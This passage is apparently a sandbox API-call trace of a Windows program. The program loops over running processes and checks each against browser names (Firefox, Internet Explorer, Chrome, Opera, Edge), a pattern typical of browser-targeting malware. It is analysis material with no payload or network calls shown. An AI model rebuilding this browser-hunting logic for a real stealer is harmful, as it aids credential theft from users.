th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.219] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0240.219] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0240.219] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0240.219] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0240.219] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.219] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0240.220] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0240.220] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0240.220] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0240.220] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0240.220] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.220] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0240.221] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0240.221] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0240.221] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0240.221] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0240.221] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.221] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.221] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0240.221] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0240.221] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0240.221] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0240.221] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.221] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.222] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0240.222] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0240.222] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0240.222] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0240.222] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.222] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.222] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0240.222] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0240.222] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0240.222] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0240.222] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.222] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0240.223] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0240.223] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0240.223] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0240.223] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0240.223] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.223] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0240.223] CloseHandle (hObject=0xe8) returned 1 [0240.223] Sleep (dwMilliseconds=0x3e8) [0241.255] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0241.256] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.257] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0241.257] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0241.257] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0241.257] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0241.257] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0241.257] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0241.257] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0241.257] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0241.257] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0241.257] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0241.258] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0241.258] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0241.258] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0241.258] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0241.258] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0241.258] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0241.258] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.258] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.259] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0241.259] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0241.259] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0241.259] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0241.259] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.259] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0241.259] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0241.259] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0241.259] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0241.259] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0241.259] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.259] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.260] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0241.260] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0241.260] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0241.260] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0241.260] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.260] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0241.260] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0241.260] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0241.260] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0241.260] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0241.260] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.260] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0241.261] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0241.261] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0241.261] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0241.261] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0241.261] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.261] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.262] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0241.262] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0241.262] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0241.262] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0241.262] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.262] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0241.262] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0241.262] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0241.262] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0241.262] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0241.262] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.262] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.264] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.264] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.264] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.264] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0241.264] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.264] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.265] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.265] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.265] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.265] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0241.265] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.265] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.265] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.265] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.265] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.266] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0241.266] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.266] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.266] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.266] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.266] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.266] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0241.266] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.266] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.267] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.267] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.267] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.267] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0241.267] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.267] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0241.267] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0241.267] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0241.267] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0241.267] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0241.267] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.267] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.268] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.268] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.268] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.268] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0241.268] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.268] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.268] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.268] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.268] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.269] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0241.269] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.269] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.269] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0241.269] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0241.269] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0241.269] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0241.269] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.269] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0241.270] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0241.270] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0241.270] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0241.270] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0241.270] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.270] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0241.270] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0241.270] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0241.270] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0241.270] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0241.270] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.270] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.271] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.271] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.271] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.271] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0241.271] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.271] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0241.271] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0241.271] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0241.271] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0241.272] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0241.272] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.272] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0241.272] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0241.272] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0241.272] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0241.272] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0241.272] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.272] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0241.273] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0241.273] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0241.273] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0241.273] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0241.273] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.273] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0241.273] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0241.273] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0241.273] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0241.273] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0241.273] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.273] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0241.274] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0241.274] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0241.274] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0241.274] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0241.274] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.274] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0241.274] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0241.274] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0241.274] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0241.274] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0241.274] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.274] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0241.275] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0241.275] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0241.275] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0241.275] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0241.275] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.275] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0241.276] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0241.276] 